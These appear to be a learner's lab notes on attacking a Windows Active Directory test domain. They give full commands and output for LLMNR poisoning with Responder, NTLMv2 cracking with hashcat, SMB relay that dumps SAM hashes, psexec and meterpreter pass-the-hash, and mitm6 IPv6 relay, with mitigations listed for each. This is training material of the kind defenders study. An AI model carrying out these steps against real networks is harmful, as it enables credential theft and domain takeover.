Abusing Windows features. https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
- used to identify hosts when DNS fails to do so.
- response includes a username and password hash.
- run responder early in the morning or after lunch. When an event occurs, we get usernames and dem hashes. We can crak these hashes with hashcat.
- on kali, run your listener with
responder -I eth0 -w -d -v - on fcastle machine, open explorer and try to connect to your kali ip:
//your-kali-ip - it should be intercepted:
[SMB] NTLMv2-SSP Username : MARVEL\fcastle
[SMB] NTLMv2-SSP Hash : fcastle::MARVEL:2609515b2bb25e5a:F76239F7204A69D49A77B4EF98D6357C:01010000000000000066564B52E2DA01576913D4783F58F60000000002000800370050005000510001001E00570049004E002D004E0037004E004C004A0034003100300048005300520004003400570049004E002D004E0037004E004C004A003400310030004800530052002E0037005000500051002E004C004F00430041004C000300140037005000500051002E004C004F00430041004C000500140037005000500051002E004C004F00430041004C00070008000066564B52E2DA0106000400020000000800300030000000000000000000000000200000535A1B52C70E295C65366BFC5AF851D34870F09AF82762BEA1B979D4D996ED2B0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00390032002E003100320038000000000000000000
- copy the hash and save it to a file with
gedit ntlmhash.txt hashcat --helpto know the code for the hash algorithms, orhashcat --help | grep NTLM:
5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocol
27000 | NetNTLMv1 / NetNTLMv1+ESS (NT) | Network Protocol
5600 | NetNTLMv2 | Network Protocol
27100 | NetNTLMv2 (NT) | Network Protocol
1000 | NTLM | Operating System
- wordlists: https://github.com/danielmiessler/SecLists (rockyou is sufficient for ctf challenges)
- run
hashcat -m 5600 ntlmhash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 8845HS w/ Radeon 780M Graphics, 1435/2935 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs
FCASTLE::MARVEL:2609515b2bb25e5a:f76239f7204a69d49a77b4ef98d6357c:01010000000000000066564b52e2da01576913d4783f58f60000000002000800370050005000510001001e00570049004e002d004e0037004e004c004a0034003100300048005300520004003400570049004e002d004e0037004e004c004a003400310030004800530052002e0037005000500051002e004c004f00430041004c000300140037005000500051002e004c004f00430041004c000500140037005000500051002e004c004f00430041004c00070008000066564b52e2da0106000400020000000800300030000000000000000000000000200000535a1b52c70e295c65366bfc5af851d34870f09af82762bea1b979d4d996ed2b0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00390032002e003100320038000000000000000000:Password1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: FCASTLE::MARVEL:2609515b2bb25e5a:f76239f7204a69d49a...000000
Time.Started.....: Tue Jul 30 08:10:07 2024, (1 sec)
Time.Estimated...: Tue Jul 30 08:10:08 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 43570 H/s (0.97ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4096/14344385 (0.03%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 3072/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: adriano -> oooooo
Hardware.Mon.#1..: Util: 26%
Started: Tue Jul 30 08:09:30 2024
Stopped: Tue Jul 30 08:10:09 2024
- better to run it directly on your machine. https://hashcat.net/hashcat/
- disable LLMNR/NBT-NS.
- if it's not possible, require network access control and require strong user passwords (>14 characters and limit common word usage).
- relay the hashes to potentially gain access
- SMB signing must be disabled on the target. Relayed user credentials must be admin on machine.
- we need to disable response on responder. When we relay, we'll have access to the SAM hashes.
- on your user machines, make sure you enable network discovery. Explorer > Network > click to enable network discovery.
- on your kali machine, run
nmap --script=smb2-security-mode.nse -p445 192.168.92.141 -Pn
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
We can't relay against the domain controller, but we can against the two user machines:
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
You can do nmap --script=smb2-security-mode.nse -p445 192.168.92.0/24 to scan the whole range.
- create a file with the two user machine ips :
nano targets.txt. - edit the responder config:
sudo mousepad /etc/responder/Responder.conf. Switch off SMB and HTTP. Save and exit. - run
responder -I eth0 -w -d -v - open a new terminal tab, run
ntlmrelayx.py -tf targets.txt -smb2support - try to connect to your kali ip from explorer on a user machine:
\\your-kali-ip-address
You should get the SAM hashes:
[*] Authenticating against smb://192.168.92.143 as MARVEL\fcastle SUCCEED
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[-] 'CurrentState'
[*] Target system bootKey: 0xd5e4e63686495819c507396b4b6abcee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a34abbe24dd37ffed905ebf100c6af3b:::
David Lieberman:1001:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
[*] Done dumping SAM hashes for host: 192.168.92.143
- run
ntlmrelayx.py -tf targets.txt -smb2support -ito get an interactive shell:
Started interactive SMB client shell via TCP on 127.0.0.1:11000
- open a new terminal tab, run
nc 127.0.0.1 11000, thenhelpto get all the available commands.sharesto see available shared folders, thenuse C$andls. - we can also execute commands directly:
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
- enabling SMB signing on all devices.
- disabling NTLM auth on network (note that Windows defaults back to it when Kerberos stops works)
- account tiering: limits domain admins to specific tasks. User account for user machine, specific account when connection as domain admin. Difficult for admins to have 2 accounts.
- local admin restriction: can prevent a lot of lateral movement. But can increase the amount of service desk tickets (users will need to fill in tickets when they want a software installed).
- run
msfconsole, thenuse exploit/windows/smb/psexec, with a password or a hash (noisy). set payload windows/x64/meterpreter/reverse_tcp- we want to attack fcastle:
set rhosts 192.168.92.142 set smbdomain MARVEL.localset smbuser fcastleset smbpass Password1- you can do
show targetsif automatic is not working - run
exploit - use
backgroundto keep a session, switch between sessions withsessionsandsessions 1for example
set smbuser administrator-unset smbdomainset smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0- run
exploit
psexec.py MARVEL/fcastle:'Password1'@192.168.92.142, with a password or a hash (less noisy).psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
If it is not working, you can use wmiexec.py or smbexec.py instead.
- much more reliable than responder and relay attacks. Often, ipv4 is used, so nobody is taking care of the dns for ipv6. LDAP relaying.
- do not run this more than 10 minutes, it can bring the network down.
- on your kali machine, open the relay listener, with the domain controller IP:
ntlmrelayx.py -6 -t ldaps://192.168.92.141 -wh fakewpad.marvel.local -l lootme - in another tab, start
mitm6 -d marvel.local - restart fcastle machine.
- on your kali machine, you should get a folder called
lootmewith domain computers, groups, and users. - when someone logs in, a new user is created for us.
- disabling ipv6 is not ideal.
- block the following settings: dynamic host config protocol for ipv6, router advertisement, dynamic host config protocol for ipv6.
- disable WPAD if you don't use it internally.
- enable LDAP signing and LDAP channel binding.
- consider admin users as sensitive accounts that cannot be delegated or move them to the protected users group.
- useful when you're stuck.
- printers: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack
- we look for a way to connect to ldap. We can change the LDAP server address by our IP address and listen for connections to capture credentials.
- begin day with mitm6 or responder
- run scans to generate traffic (nessus)
- if scans are taking too long, look for websites in scope (http_version on metasploit) - always be multitasking!
- look for default credentials on web logins: printers, jenkins, etc.
- think outside the box. If nothing works after a few days, ask your client for some credentials created for us, so you can make sure you did your due diligence. Enumeration is key.